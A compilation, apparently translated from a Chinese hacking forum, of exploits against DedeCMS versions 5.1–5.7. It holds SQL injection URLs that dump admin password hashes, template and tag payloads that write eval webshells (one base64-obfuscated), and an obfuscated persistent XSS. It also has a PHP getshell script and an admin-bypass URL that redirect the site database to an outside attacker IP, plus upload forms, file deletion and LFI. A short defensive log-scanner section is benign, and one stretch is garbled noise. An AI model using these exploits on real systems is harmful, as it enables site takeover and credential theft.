Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line shell written directly.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar browsers block URL-type XSS, so the XSS filter has to be disabled.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. No matter how you then visit either of the URLs below, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
// usage banner when the aid argument is missing
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns only the HTTP status line; "OK" at offset 13 means "HTTP/1.1 200 OK"
if (strpos($exp,"OK")>12){
echo "\nExploit Success \n";
if($aid==1)echo "\nShell:".$url."/$path/data/cache/fuck.php\n";
if($aid==2)echo "\nShell:".$url."/$path/fuck.php\n";
if($aid==3)echo "\nShell:".$url."/$path/plus/fuck.php\n";
}else{
echo "\nExploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// POST body: doaction points mytag_js.php at itself; the _COOKIE[GLOBALS][cfg_db*] fields
// overwrite the CMS database connection settings (the variable-overwrite in the title)
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "\nNo response from ".$host."\n";
return "";
}
fwrite($ock,$data);
// reads and returns only the first line of the response
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you go straight into the site backend.
Precondition for this vulnerability: the backend path must already be known.
Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database prepared, then insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member area, publish an article and upload an image; then, in attachment management, replace the image with our crafted template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(this is the constructed part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have changed the template path. 3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
; E- u* G+ b; @$ U
* ~$ R& {$ {4 `9 m S3 p- T v+ }) q% g
' U( v+ s' k% @8 s3 N$ p0 }8 S. T0 E4 N! l8 p
* J: H# _/ x$ Y- ^
( o$ |: }( l8 Y% W/ n- q7 X" g6 I
2 `. [# G- e( |% A, f* H. k- {/ W% c% V" C5 ?
; _5 ~, Z5 u& d2 H! b6 v
( {4 E6 G! B& q) w3 F5 e
$ V- q6 B, U5 ^% M% A/ v9 K4 [
DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 characters and the last 7 removed, giving a 20-character MD5 value; from that, remove 3 from the front and 1 from the end to get the 16-character MD5.
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
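Added here as a defender-side example (not from the original post or from DedeCMS itself): a small Python scanner that flags, in web-server access logs, the variable-override parameter names that recur throughout this post, namely _COOKIE[GLOBALS][cfg_*] against mytag_js.php, _POST[GLOBALS][cfg_*] against login.php and bare cfg_* fields against select_soft_post.php. The log lines and IP addresses are constructed, and the rule assumes that no legitimate client request carries cfg_* parameter names (admin configuration pages would need to be excluded or tuned separately).

```python
import re
from urllib.parse import parse_qsl

# DedeCMS keeps its runtime configuration in $GLOBALS['cfg_*'].  The requests
# in this post reach a shell or the admin backend by smuggling those keys in
# from the client: as nested _COOKIE[GLOBALS][cfg_...] / _POST[GLOBALS][cfg_...]
# parameters, or (with register_globals on) as bare cfg_* fields.
# Assumption for this example: legitimate client traffic never uses such names.
GLOBALS_KEY = re.compile(r"^_(?:COOKIE|POST|GET|REQUEST|SESSION|SERVER)\[GLOBALS\]", re.I)
CFG_KEY = re.compile(r"^cfg_[a-z0-9_]+$", re.I)

# Apache/nginx "combined" log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_params(query_or_body: str) -> list[str]:
    """Return the parameter *names* in a query string or urlencoded body that
    attempt to override DedeCMS globals.  parse_qsl percent-decodes names, so
    _COOKIE%5BGLOBALS%5D... and _COOKIE[GLOBALS]... are treated alike.
    Values are deliberately ignored: 'keyword=cfg_dbhost' is a search term."""
    hits = []
    for name, _value in parse_qsl(query_or_body, keep_blank_values=True):
        if GLOBALS_KEY.match(name) or CFG_KEY.match(name):
            hits.append(name)
    return hits


def scan_access_log(lines):
    """Return (client_ip, path, offending_names) for every combined-format log
    line whose query string carries an override attempt.  POST bodies are not
    in an access log; feed those to suspicious_params() from a WAF/audit log."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than guess
        path, _, query = m.group("target").partition("?")
        hits = suspicious_params(query)
        if hits:
            findings.append((m.group("ip"), path, hits))
    return findings


# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /dede/login.php?dopost=login'
    '&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=198.51.100.4'
    '&_POST[GLOBALS][cfg_dbuser]=root HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Oct/2023:13:56:01 +0000] "GET /plus/view.php?aid=2 HTTP/1.1"'
    ' 200 4096 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Oct/2023:13:56:20 +0000] "GET /plus/search.php?keyword=cfg_dbhost'
    ' HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:57:02 +0000] "POST /plus/mytag_js.php?aid=1'
    '&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_ HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, names in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {path} overrides: {', '.join(names)}")
```

The same suspicious_params() check applied to request bodies catches the mytag_js.php and select_soft_post.php forms above, whose override fields travel in the POST body rather than the URL.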
织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS logging the database error message into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is shown.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Open the file test.html from dede.rar; note that the action address in the form is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the output from step 2 means the file trojan was uploaded successfully.
织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*